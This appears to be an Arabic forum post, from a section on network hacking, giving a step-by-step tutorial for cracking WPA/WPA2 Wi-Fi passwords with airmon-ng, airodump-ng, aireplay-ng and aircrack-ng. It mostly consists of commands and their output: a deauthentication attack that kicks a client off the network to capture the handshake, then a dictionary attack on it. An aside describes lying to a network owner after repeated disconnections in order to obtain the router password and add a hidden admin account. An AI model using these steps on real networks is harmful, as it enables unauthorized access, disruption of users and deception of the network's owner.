أكـــــاديمـــية ســـوفتــي
’,، أهلاً .. وسهلاً .. ,’،

,’، (( اسم العضو )) ,’،

,’، نحن سعداء بتشريفك لمنتدانا
’,، فأهلاً بك عطْراً فوَّاحاً ينثرُ شذاه في كلِّ الأَرجاء ,’،
,’، وأهلاً بك قلماً راقياً وفكراً واعياً نشتاقُ لنزفه ’,،
’,، وكلنا أملٌ بأن تجد هنا ,’،
,’، مايسعدك ويطَيِّب خاطرك ’,،
’,، فِي إنْتظَارِ هطولِ سحابة إبداعك ,’،
,’، نتمنى لَك التوفيق ومزيداً من التوهج ’,،
أكـــــاديمـــية ســـوفتــي
’,، أهلاً .. وسهلاً .. ,’،

,’، (( اسم العضو )) ,’،

,’، نحن سعداء بتشريفك لمنتدانا
’,، فأهلاً بك عطْراً فوَّاحاً ينثرُ شذاه في كلِّ الأَرجاء ,’،
,’، وأهلاً بك قلماً راقياً وفكراً واعياً نشتاقُ لنزفه ’,،
’,، وكلنا أملٌ بأن تجد هنا ,’،
,’، مايسعدك ويطَيِّب خاطرك ’,،
’,، فِي إنْتظَارِ هطولِ سحابة إبداعك ,’،
,’، نتمنى لَك التوفيق ومزيداً من التوهج ’,،
أكـــــاديمـــية ســـوفتــي
هل تريد التفاعل مع هذه المساهمة؟ كل ما عليك هو إنشاء حساب جديد ببضع خطوات أو تسجيل الدخول للمتابعة.

أكـــــاديمـــية ســـوفتــي

ســـوفــتي
 
الرئيسيةالرئيسية  أحدث الصورأحدث الصور  التسجيلالتسجيل  دخولدخول  

|  سبحان الله وبحمده ..... سبحان الله العظيم |

بحـث
 
 

نتائج البحث
 
Rechercher بحث متقدم
المواضيع الأخيرة
» إستعلام عن فاتورة شركة الكهرباء
كسر تشفير وايرلس حماية نوع wpa/wpa2 Emptyالخميس نوفمبر 08, 2012 11:40 am من طرف Ø§Ù„امبراطور

» برنامج النسخه العربية الاصلية Windows XP Professional SP3 Arabic تورنت
كسر تشفير وايرلس حماية نوع wpa/wpa2 Emptyالخميس نوفمبر 08, 2012 11:27 am من طرف Ø§Ù„امبراطور

» افلام كرتون اسلامية جديدة 2011
كسر تشفير وايرلس حماية نوع wpa/wpa2 Emptyالإثنين أكتوبر 15, 2012 5:28 am من طرف Ø§Ù„امبراطور

» تحميل ويندوز 8 - تنزيل Windows 8
كسر تشفير وايرلس حماية نوع wpa/wpa2 Emptyالأحد سبتمبر 02, 2012 11:59 am من طرف Ø§Ù„امبراطور

» Nero 7 مفعل بدون سيريال أو كراك
كسر تشفير وايرلس حماية نوع wpa/wpa2 Emptyالإثنين أغسطس 27, 2012 8:41 am من طرف Ø§Ù„امبراطور

» تدريس الفيزياء بطريقة غير نمطية
كسر تشفير وايرلس حماية نوع wpa/wpa2 Emptyالجمعة أغسطس 17, 2012 3:07 pm من طرف Ø§Ù„امبراطور

» جندي في الحرس الملكي
كسر تشفير وايرلس حماية نوع wpa/wpa2 Emptyالأحد أغسطس 12, 2012 4:55 am من طرف Ø§Ù„امبراطور

» تفعيل الكاسبر اسكي kaspersky مجانا --- +++
كسر تشفير وايرلس حماية نوع wpa/wpa2 Emptyالسبت أغسطس 04, 2012 4:36 am من طرف Ø§Ù„امبراطور

» هل بالامكان استرجاع الملفات بعد حذفها من الهاردسك؟
كسر تشفير وايرلس حماية نوع wpa/wpa2 Emptyالإثنين يوليو 30, 2012 1:40 pm من طرف Ø§Ù„امبراطور

ازرار التصفُّح
 البوابة
 الرئيسية
 قائمة الاعضاء
 البيانات الشخصية
 س .و .ج
 بحـث
منتدى
التبادل الاعلاني
ازرار التصفُّح
 البوابة
 الرئيسية
 قائمة الاعضاء
 البيانات الشخصية
 س .و .ج
 بحـث
ازرار التصفُّح
 البوابة
 الرئيسية
 قائمة الاعضاء
 البيانات الشخصية
 س .و .ج
 بحـث

 

 كسر تشفير وايرلس حماية نوع wpa/wpa2

اذهب الى الأسفل 
كاتب الموضوعرسالة
الامبراطور

الامبراطور


عدد المساهمات : 2168
نقاط : 5733
السٌّمعَة : 68
تاريخ التسجيل : 04/02/2009
العمر : 31

كسر تشفير وايرلس حماية نوع wpa/wpa2 Empty
مُساهمةموضوع: كسر تشفير وايرلس حماية نوع wpa/wpa2   كسر تشفير وايرلس حماية نوع wpa/wpa2 Emptyالأربعاء أغسطس 24, 2011 2:13 pm

<~!~SyRiA - HaC~!~> :: ..:::قسم أختراق الشبكات:::..
صفحة 1 من اصل 1 • شاطر •

استعرض الموضوع السابق استعرض الموضوع التالي اذهب الى الأسفل

*
*
*
*
*
*
*

كسر تشفير وايرلس عليها حماية نوع wpa/wpa2

مُساهمة MRAAAD في السبت أكتوبر 09, 2010 5:40 am
السلام عليكم ورحمة الله وبركاته
أضع بين أيديكم .. شرح كيفية كسر حماية وايرلس نوع التشفير اللي فيها
wpa/wpa2
وهو يعتبر من اقوى الحمايات .. والذي يعتمد على فصل أحد المشتركين او المتصلين بالراوتر ثم الحصول على هاند شيك...
يعني أن نحصل على ملف كاب الذي يتم تخمين كلمة السر الموجودة فيه
الأدوات المستخدمة ..
airodump
aireplay
aircrack
والعمل تحت نظام لينوكس توزيعه باك تراك4
لأنهم موجودين فيه وما في داعي نزلهم
طيب الأن أكثر المستخدمين هم لتوزيعه أوبونتو .. أقول نزلو حزمة aircrack
لكن يختلف مكان الإستخدام من الشيل لأن ممكن واحد وضعها في مكان وهو عم ينفذ الأمر من مكان .. وتنهال الأسئلة علي .. انه لم يشتغل .. أقول ان لم تعرف كيف تنزل .. ومن أين تكتب الأوامر . . تعلم على المبادىء بعدين لكل حادث حديث
بدون إطالة .. الدرس عن كسر حماية نوع wpa/wpa2
لعشاق النسخ واللصق الرجاء ذكر الحقوق
m0j4h3d
vbhacker.net/vb
قد يسأل البعض كيف بعرفها .. وبميزها من web أقول
أولا يجب معرفة اسم كرت النت وورك الهوائي الموجود عندك ولمعرفه ذلك تكتب في الشيل
iwconfig
اللي مكتوب بجنبه
no wireless extensions.
يعني مش كرت وايرلس
اما المكتوب بجنبه مثل هالكلام


كود:

wlan0 IEEE 802.11bg ESSID:""
Mode:Managed Frequency:2.412 GHz Access Point: Not-Associated
Tx-Power=27 dBm
Retry min limit:7 RTS thr:off Fragment thr:off
Encryption key:off
Power Management:off
Link Quality:0 Signal level:0 Noise level:0
Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0
Tx excessive retries:0 Invalid misc:0 Missed beacon:0



عندي اسمه wlan0 قد يكون عند الغير eth1 او حسب اسمه
يكون هو الكرت .. قد نجد أكثر من واحد .. لأن الشخص ممكن يكون عنده أكثر من كرت بجهازه هو مركبهم ..
ولمستخدمي اللابتوبات .. أكيد يوجد كرت هوائي .. ولمعرف اسمه نفعل مثل فوق
الأن عرفنا اسم الكرت الهوائي ..
أول شي نشغل الكرت على المونيتور .. يعني المراقبة
airmon-ng start wlan0

قد يشتغل المونيتور ليس على نفس الإسم


كود:

root@bt:~# airmon-ng start wlan0


Interface Chipset Driver

wlan0 Atheros ath5k - [phy0]air
(monitor mode enabled on mon0)




كما قال هنا أنه تم تفعيل المراقبة على اسم
mon0
هنا كل واحد لازم يعرف
وأنا سأكمل حسب الموجود عندي
بعد هذا .. وأهم شيئ .. هو أن يكون الكرت عندك يدعم الحقن .. يعني يحقن باكيتس
وهو ضروري جدا .. ولمعرف ذلك أكتب


بعدين
airodump-ng mon0
حتى نشوف الراوترات المحيطة بنا


كود:

CH 8 ][ Elapsed: 12 s ][ 2010-03-12 10:39

BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

00:1F:9F:D3:1F:EB -48 24 0 0 1 54 WPA2 CCMP PSK ThomsonE2A46B

BSSID STATION PWR Rate Lost Packets Probes

00:1F:9F:D3:1F:EB 00:13:CE:4F:B5:51 -49 0 -24 38 20 ThomsonE2A46B





الأن كما نلاحظ أن نوع الحمايه هو wpa2 psk
pre shared key
يعني لازم يتم فصل مستخدم حتى نحصل على ملف الكاب لنكسره فيما بعد
والمهم للكسر هو معرفة القناة
CH .. channel اللي شغالة عليها الراوتر
هنا هي القناة 1
كم نلاحظ تحت CH
وأهم شي .. هو الماك أدريس للراوتر وللمستخدم
الان نوقف المراقبة على أسماء الكروت .. (يمكننا أن نعمل مراقبة ,, لكن رح يطلع اسم كرت غير .. حست نوعية الكرت .. وهو هل حديث .. لأنه بهالحالة يقدم خصائص متميزة)
المهم سأشرح الأسهل والموجود عند الجميع


كود:

airmon-ng stop mon0
airmon-ng stop wlan0

root@bt:~# airmon-ng stop mon0


Interface Chipset Driver

wlan0 Atheros ath5k - [phy0]
mon0 Atheros ath5k - [phy0] (removed)

root@bt:~# airmon-ng stop wlan0


Interface Chipset Driver

wlan0 Atheros ath5k - [phy0]
(monitor mode disabled)





هكذا نكون وقفنا المراقبة
الأن نعيد تشغيلها لكن على القناة الخاصة بالراوتر اللي يجب أن نكسرهاوهي هنا رقم 1


كود:

airmon-ng start wlan0 1

root@bt:~# airmon-ng start wlan0 1


Interface Chipset Driver

wlan0 Atheros ath5k - [phy0]
(monitor mode enabled on mon0)




اخبرنا أن المراقبة شغالة على mon0


بعد هذا .. وأهم شيئ .. هو أن يكون الكرت عندك يدعم الحقن .. يعني يحقن باكيتس
وهو ضروري جدا .. ولمعرف ذلك أكتب


كود:

aireplay-ng -9 -e ThomsonE2A46B -a 00:1F:9F:D3:1F:EB mon0



-9 لمعرفة إذا يدعم الحقن
-e وبعدها اسم الراوتر
-a وبعدها الماك ادريس للراوتر
mon0 اسم الكرت اللي شغلنا المراقبة عليه

نلاحظ شو يطلعلنا


كود:

11:10:48 Waiting for beacon frame (BSSID: 00:1F:9F:D3:1F:EB) on channel 1
11:10:48 Trying broadcast probe requests...
11:10:48 Injection is working!
11:10:49 Found 1 AP

11:10:49 Trying directed probe requests...
11:10:49 00:1F:9F:D3:1F:EB - channel: 1 - 'ThomsonE2A46B'
11:10:49 Ping (min/avg/max): 1.249ms/3.204ms/6.293ms Power: -41.93
11:10:49 30/30: 100%





نلاحظ
11:10:48 Injection is working!
11:10:49 30/30: 100%
يعني كل شي شغال وتمام
ملاحظة .. يجب أن تكون قريب كفاية من الراوتر ..او عندك مقـوي اشارة



الأن لمراقبة الراوتر ومستخدميها نكتب


كود:

airodump-ng -c 1 --bssid 00:1F:9F:D3:1F:EB -w ttt mon0




-c 1 يعني القناة 1 وهي الموجود عليها الراوتر
--bssid وبعدها الماك أدريس للراوتر
-w وبعدها اسم الملف الذي سيخرج للحصول على شبك وهاند شيك
mon0 اسم الكرت اللي تم عليه المراقبة
نلاحظ


كود:

CH 1 ][ Elapsed: 1 min ][ 2010-03-12 10:50

BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

00:1F:9F:D3:1F:EB -44 100 1120 35 0 1 54 WPA2 CCMP PSK ThomsonE2A46B

BSSID STATION PWR Rate Lost Packets Probes

00:1F:9F:D3:1F:EB 00:13:CE:4F:B5:51 -47 1 -36 0 785




الأن المراقبة شغالة .. وأذكر انه مهم ان يظهر على اليمين في الأعلي
handshake
الأن للحصول على هاند شيك يجب فصل المستخدم على الراوتر
فنستخدم هذا الأمرفي شاشة شيل تانية


كود:

aireplay-ng -0 1 -a 00:1F:9F:D3:1F:EB -c 00:13:CE:4F:B5:51 mon0



-0 لعمل deauthentication والرقم 1 هو يعني مرة واحدة .. اننا سنفصل مرة واحدة
(ملاحظة .. يمكننا استخدام الهندسة الإجتماعية ان لم ننجح بمعرفة كلمة السر .. وهو ان نفصل حوالي مليون مرة .. ونقول لصاحب الشكبة اننا نعرف الحل ويمكننا المساعده .. لكن يجب معرفة كلمة السر والدخول للراوتر ومن هالحكي الكذب ههه
هو يوثق فينا .. وعندها ندخل للراوتر .. نضيف مستخدم دخول مع كلمة سر خاصة به ونغير اللي بدنا اياه هههه .. طريقة نافعه .. ونجحت معي )

-a الماك أدريس للراوتر
-c الماك أدريس للمستخدم اللي نريد فصله
mon0 اسم الكرت اللي نراقب عليه ..
نلاحظ شو يطلعلنا


كود:

root@bt:~# aireplay-ng -0 1 -a 00:1F:9F:D3:1F:EB -c 00:13:CE:4F:B5:51 mon0
10:56:20 Waiting for beacon frame (BSSID: 00:1F:9F:D3:1F:EB) on channel 1
10:56:21 Sending 64 directed DeAuth. STMAC: [00:13:CE:4F:B5:51] [16|66 ACKs]




بعد تطبيق الأمر .. نكون فصلنا مستخدم وقطعنا عنه الإتصال ثم عاد ودخل ونكون نحن حصلنا على ملف الكاب اللي فيه كلمة السر ويجب تخمينها ..


كود:

CH 1 ][ Elapsed: 6 mins ][ 2010-03-12 10:57 ][ WPA handshake: 00:1F:9F:D3:1F:EB

BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

00:1F:9F:D3:1F:EB -44 100 4060 115 2 1 54 WPA2 CCMP PSK ThomsonE2A46B

BSSID STATION PWR Rate Lost Packets Probes

00:1F:9F:D3:1F:EB 00:13:CE:4F:B5:51 -42 54 - 2 0 2976




نلاحظ على اليمين في الأعلى
WPA handshake: 00:1F:9F:D3:1F:EB
وهي مهمة .. وتعني أنه تم الفصل

الأن حصلنا على ملف الكاب .. ويمكننا أنو نوقف المراقبة الأن
يعني نوقف ال
airodump-ng
ما عدنا محتاجينها
الأن جاء الدور المهم وهو تخمين كلمة السر(أقول تخمين لأن هذه الحماية بدها تخمين .. مش متل الويب نجمع باكيتس ونكسرهم)

نستخدم الأن ونكتب


كود:

aircrack-ng -w passowrds.lst -b 00:1F:9F:D3:1F:EB tt*.cap


الرجوع الى أعلى الصفحة اذهب الى الأسفل
https://f11f.ahlamontada.com/forum
 
كسر تشفير وايرلس حماية نوع wpa/wpa2
الرجوع الى أعلى الصفحة 
صفحة 1 من اصل 1

صلاحيات هذا المنتدى:لاتستطيع الرد على المواضيع في هذا المنتدى
أكـــــاديمـــية ســـوفتــي :: الـــــــشــــــبــــــكــــــات-
انتقل الى: